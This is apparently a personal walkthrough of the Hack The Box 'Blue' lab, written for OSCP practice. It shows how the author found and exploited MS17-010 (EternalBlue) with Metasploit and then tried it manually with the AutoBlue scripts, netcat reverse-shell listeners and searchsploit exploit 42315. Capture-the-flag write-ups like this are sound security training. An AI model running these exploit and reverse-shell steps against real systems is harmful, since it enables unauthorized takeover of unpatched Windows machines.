This my attempt to create a walk through on HTB’s Blue:
Autorecon:
Autorecon-445:
Looking at the ports that were scanned ports 135, 139 didn’t turn up anything valuable to look at.
But Port 445 has a lot of information and gives a possible vulnerability to look at:
So we see “ms17-010” looks to be a vulnerability which is “eternalblue”
Let’s try metasploit and see what happens
Metasploit:
Looks like “Eternalblue” worked on metasploit and it looks like were in:
Privilege Escalation:
User Flag:
Now that we’re in I want to see if I can find the user flag:
Looks like I found the user flag.
Root Flag:
Now I want to see if I can find the root flag,
Going a few directories I think I saw an Administrator Direcotry:
And Yes, sure enough there is an “Administrator’s direcory”
Exploit EternalBlue Mannually:
Since I’m practicing for the OSCP, I need to learn how to exploit machines without always having Metasploit avaliable.
I found this script:
https://github.com/3ndG4me/AutoBlue-MS17-010
Check if the target is vulnerable (assuming I didn’t have autorecon)
python eternal_checker.py <target ip>:
Create a shell:
cd shellcode
./shell_prep.sh
Start a listener:
nc -lvp 4444
nc -lvp 5555
Let’s exploit, from /shellcode back to /AutoBlue-MS17–010/shellcode
I will use eternalblue_exploit7.py:
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
It failed no shell in my listener:
I’m going to try to create a new shell since this is one is failing.
cd shellcode
rm sc*
Ls
Create the new shell:
cd shellcode
./shell_prep.sh
Start new listeners:
Okay, so I ran the shell twice, I’m going to try to find a different exploit
New Exploit:
Using searchsploit:
Searchsploit –id MS17-10:
I’m working with Windows 7 so we’ll use exploit # 42315. Clone the exploit into the working directory.
searchsploit -m 42315
After looking at the source code, I need to do three things:
- Download mysmb.py since the exploit imports it. The download location is included in the exploit.
- Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
- Make changes in the exploit to add the authentication credentials and the reverse shell payload.
First, download the file and rename it to mysmb.py
mv 42315.py.1 mysmb.py